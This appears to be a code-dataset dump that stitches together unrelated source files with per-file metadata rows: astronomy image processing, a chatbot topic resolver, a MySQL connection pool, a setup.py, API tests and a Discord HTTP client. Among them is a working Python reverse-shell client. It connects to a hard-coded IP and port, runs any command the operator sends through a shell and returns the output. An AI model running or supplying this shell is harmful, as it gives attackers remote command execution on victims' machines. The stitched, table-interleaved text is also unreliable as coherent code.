if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined and this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
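# Editor's worked example (not part of the original module): the conversion
# factor used in convert_units(), computed for a hypothetical 100 micron
# pivot wavelength, to make the W / (m2 * arcsec2 * micron) -> MJy / sr
# chain explicit with plain astropy calls.
if __name__ == "__main__":
    example_pivot = 100.0 * Unit("micron")
    # one micron of bandwidth expressed in Hz at this pivot wavelength
    factor = (example_pivot ** 2 / speed_of_light).to("micron/Hz").value
    # W / (m2 * Hz) -> MJy, and per arcsec2 -> per sr
    factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
    print("1 W / (m2 * arcsec2 * micron) =", factor, "MJy / sr at 100 micron")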
| 35.134804
| 209
| 0.548936
| 1,585
| 14,335
| 4.849211
| 0.181073
| 0.042935
| 0.030445
| 0.037211
| 0.269321
| 0.228858
| 0.161202
| 0.139735
| 0.130887
| 0.115405
| 0
| 0.005864
| 0.31001
| 14,335
| 407
| 210
| 35.22113
| 0.771105
| 0.387792
| 0
| 0.157895
| 0
| 0
| 0.100957
| 0
| 0
| 0
| 0
| 0.004914
| 0
| 1
| 0.078947
| false
| 0
| 0.087719
| 0
| 0.184211
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c1d48ace52455ffd7fc2885603c6dc3baa53ba
| 5,876
|
py
|
Python
|
venv/Lib/site-packages/rivescript/inheritance.py
|
Hazemcodes/GimmyBot
|
f24cb90e0d3c045100f59def1d5e14bef367cba7
|
[
"Apache-2.0"
] | 154
|
2015-02-04T08:41:23.000Z
|
2022-03-18T19:39:53.000Z
|
venv/Lib/site-packages/rivescript/inheritance.py
|
Hazemcodes/GimmyBot
|
f24cb90e0d3c045100f59def1d5e14bef367cba7
|
[
"Apache-2.0"
] | 115
|
2015-06-14T13:31:07.000Z
|
2022-02-14T23:02:19.000Z
|
venv/Lib/site-packages/rivescript/inheritance.py
|
Hazemcodes/GimmyBot
|
f24cb90e0d3c045100f59def1d5e14bef367cba7
|
[
"Apache-2.0"
] | 87
|
2015-04-18T23:15:18.000Z
|
2022-03-18T09:52:06.000Z
|
# RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itself.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
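# Editor's illustration (not part of the original module): what the
# {inherits} prefixing above produces. For a hypothetical
# "> topic alpha inherits gamma", alpha's own triggers come back tagged with
# {inherits=0} while gamma's stay untagged, so later sorting can keep alpha's
# triggers ahead of gamma's even if gamma contains a bare '*':
if __name__ == "__main__":
    inheritance = 0
    alpha_triggers = ["hello bot", "*"]
    prefixed = ["{inherits=" + str(inheritance) + "}" + t for t in alpha_triggers]
    print(prefixed)  # ['{inherits=0}hello bot', '{inherits=0}*']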
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| 40.524138
| 107
| 0.651293
| 790
| 5,876
| 4.798734
| 0.268354
| 0.013717
| 0.018992
| 0.020311
| 0.192561
| 0.129254
| 0.100765
| 0.08441
| 0.08441
| 0.08441
| 0
| 0.003679
| 0.259871
| 5,876
| 144
| 108
| 40.805556
| 0.868016
| 0.534888
| 0
| 0.204082
| 0
| 0
| 0.12476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c2063c53b34bc28b910dfe0bb280da49581724
| 2,560
|
py
|
Python
|
src/dataAccess/Connection.py
|
mattmillr/utaka
|
6622e9057c323b0aed1113f8723404d264a7c82e
|
[
"Apache-2.0"
] | 1
|
2016-10-24T02:45:11.000Z
|
2016-10-24T02:45:11.000Z
|
src/dataAccess/Connection.py
|
mattmillr/utaka
|
6622e9057c323b0aed1113f8723404d264a7c82e
|
[
"Apache-2.0"
] | null | null | null |
src/dataAccess/Connection.py
|
mattmillr/utaka
|
6622e9057c323b0aed1113f8723404d264a7c82e
|
[
"Apache-2.0"
] | null | null | null |
#Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
# pop from the pool that matches the requested cursor type
pool = dcp if useDictCursor else rcp
if len(pool) > 0:
self.innerConn = pool.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
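# Editor's usage sketch (not part of the original module): typical lifecycle
# of a pooled connection. Running it for real needs the utaka config file and
# a reachable MySQL server, so it is only defined here, not called.
def _pool_demo():
    conn = Connection(useDictCursor=True)
    try:
        # executeStatement() proxies to the inner MySQLdb cursor
        return conn.executeStatement('SELECT %s', ('ping',))
    finally:
        # commit and hand the inner connection back to the module-level pool
        conn.close()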
| 29.767442
| 98
| 0.75625
| 331
| 2,560
| 5.800604
| 0.459215
| 0.094792
| 0.029688
| 0.016667
| 0.035417
| 0.035417
| 0.035417
| 0
| 0
| 0
| 0
| 0.006428
| 0.149219
| 2,560
| 85
| 99
| 30.117647
| 0.875115
| 0.349609
| 0
| 0.196078
| 0
| 0
| 0.098668
| 0.033293
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.078431
| 0.058824
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c55601d180bba88cdc945fcda09ef1976ad00b
| 1,617
|
py
|
Python
|
setup.py
|
DKorytkin/pylint-pytest
|
097b7767e5f33ad512d421bea9ebb74a251f47bd
|
[
"MIT"
] | null | null | null |
setup.py
|
DKorytkin/pylint-pytest
|
097b7767e5f33ad512d421bea9ebb74a251f47bd
|
[
"MIT"
] | null | null | null |
setup.py
|
DKorytkin/pylint-pytest
|
097b7767e5f33ad512d421bea9ebb74a251f47bd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='Reverb Chu',
author_email='pylint-pytest@reverbc.tw',
maintainer='Reverb Chu',
maintainer_email='pylint-pytest@reverbc.tw',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| 33
| 78
| 0.63389
| 174
| 1,617
| 5.793103
| 0.54023
| 0.131944
| 0.173611
| 0.128968
| 0.051587
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014151
| 0.213358
| 1,617
| 48
| 79
| 33.6875
| 0.778302
| 0.025974
| 0
| 0.04878
| 0
| 0
| 0.497139
| 0.030515
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04878
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c5712ca1f4ef817490766e027dfd8c59267d52
| 1,637
|
py
|
Python
|
Shells/Python/Client/TCPReverseShell.py
|
lismore/OffensiveCyberTools
|
c43fb78f0067498e53cfa5aad9e0fd60ebd6e069
|
[
"MIT"
] | 1
|
2021-05-18T04:35:38.000Z
|
2021-05-18T04:35:38.000Z
|
Shells/Python/Client/TCPReverseShell.py
|
lismore/OffensiveCyberTools
|
c43fb78f0067498e53cfa5aad9e0fd60ebd6e069
|
[
"MIT"
] | null | null | null |
Shells/Python/Client/TCPReverseShell.py
|
lismore/OffensiveCyberTools
|
c43fb78f0067498e53cfa5aad9e0fd60ebd6e069
|
[
"MIT"
] | 1
|
2021-05-18T04:35:40.000Z
|
2021-05-18T04:35:40.000Z
|
# Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
# Start client function
def startClient():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create the socket object 'sock'
    sock.connect(('192.168.1.95', 5000))  # replace the IP and listening port with your attack machine's
    while True:  # start an infinite loop
        sentCommand = sock.recv(1024)  # read the first KB of the TCP socket
        if 'terminate' in sentCommand:  # a 'terminate' string from the attack machine closes the socket and ends the loop
            sock.close()
            break
        else:  # otherwise, the received command is passed to the victim's shell
            CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            sock.send(CMD.stdout.read())  # return shell output
            sock.send(CMD.stderr.read())  # return any shell errors

# Main function
def main():
    startClient()

# Program entry point
main()
| 43.078947
| 166
| 0.508247
| 164
| 1,637
| 5.060976
| 0.585366
| 0.050602
| 0.026506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016886
| 0.348809
| 1,637
| 37
| 167
| 44.243243
| 0.761726
| 0.444105
| 0
| 0
| 0
| 0
| 0.02349
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c720ca02631a4c8efcc9abc342c50fb241f153
| 1,324
|
py
|
Python
|
tests/products/test_products.py
|
AlexandruScrob/fast_api_proj_2
|
9aca5d48ab3e42933747b23ff04c6d4f3487d93e
|
[
"MIT"
] | null | null | null |
tests/products/test_products.py
|
AlexandruScrob/fast_api_proj_2
|
9aca5d48ab3e42933747b23ff04c6d4f3487d93e
|
[
"MIT"
] | null | null | null |
tests/products/test_products.py
|
AlexandruScrob/fast_api_proj_2
|
9aca5d48ab3e42933747b23ff04c6d4f3487d93e
|
[
"MIT"
] | null | null | null |
import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
    async with AsyncClient(app=app, base_url="http://test") as ac:
        category_obj = await category_info()
        payload = {
            "name": "Quaker Oats",
            "quantity": 4,
            "description": "Quaker: Good Quality Oats",
            "price": 10,
            "category_id": category_obj.id,
        }
        response = await ac.post("/products/", json=payload)
        assert response.status_code == 201
        json_response = response.json()
        assert json_response["name"] == "Quaker Oats"
        assert json_response["quantity"] == 4
        assert json_response["description"] == "Quaker: Good Quality Oats"
        assert json_response["price"] == 10


@pytest.mark.asyncio
async def test_list_products():
    async with AsyncClient(app=app, base_url="http://test") as ac:
        category_obj = await category_info()
        await product_info(category_obj)
        response = await ac.get("/products/")
        assert response.status_code == 200
        assert "name" in response.json()[0]
        assert "quantity" in response.json()[0]
        assert "description" in response.json()[0]
        assert "price" in response.json()[0]
| 29.422222
| 70
| 0.654834
| 166
| 1,324
| 5.072289
| 0.313253
| 0.071259
| 0.085511
| 0.071259
| 0.393112
| 0.24228
| 0.173397
| 0.173397
| 0.173397
| 0.173397
| 0
| 0.015595
| 0.225076
| 1,324
| 44
| 71
| 30.090909
| 0.805068
| 0
| 0
| 0.181818
| 0
| 0
| 0.157855
| 0
| 0
| 0
| 0
| 0
| 0.30303
| 1
| 0
| false
| 0
| 0.121212
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c89c536a5a429da0bac1d845d414b2ea221030
| 4,251
|
py
|
Python
|
restcord/http.py
|
Yandawl/restcord.py
|
eeaf75f4a3d05f3837906a60d5f4a9395c4933ff
|
[
"MIT"
] | 4
|
2020-07-14T19:45:44.000Z
|
2021-08-11T20:15:51.000Z
|
restcord/http.py
|
Yandawl/restcord.py
|
eeaf75f4a3d05f3837906a60d5f4a9395c4933ff
|
[
"MIT"
] | 1
|
2020-07-26T03:06:09.000Z
|
2020-07-26T03:06:09.000Z
|
restcord/http.py
|
Yandawl/restcord.py
|
eeaf75f4a3d05f3837906a60d5f4a9395c4933ff
|
[
"MIT"
] | 1
|
2021-05-28T07:23:40.000Z
|
2021-05-28T07:23:40.000Z
|
# -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
| 29.317241
| 173
| 0.593037
| 490
| 4,251
| 4.904082
| 0.302041
| 0.026217
| 0.017478
| 0.032459
| 0.088223
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0106
| 0.289814
| 4,251
| 144
| 174
| 29.520833
| 0.785359
| 0.017172
| 0
| 0
| 0
| 0.018868
| 0.154123
| 0.043145
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04717
| false
| 0.009434
| 0.09434
| 0.009434
| 0.254717
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ca8c56131d2ab13002b353ba23eeec4638f221
| 2,613
|
py
|
Python
|
mechanical_markdown/parsers.py
|
greenie-msft/mechanical-markdown
|
4fb410a34038fab7d270383561726dd4da7a2aca
|
[
"MIT"
] | null | null | null |
mechanical_markdown/parsers.py
|
greenie-msft/mechanical-markdown
|
4fb410a34038fab7d270383561726dd4da7a2aca
|
[
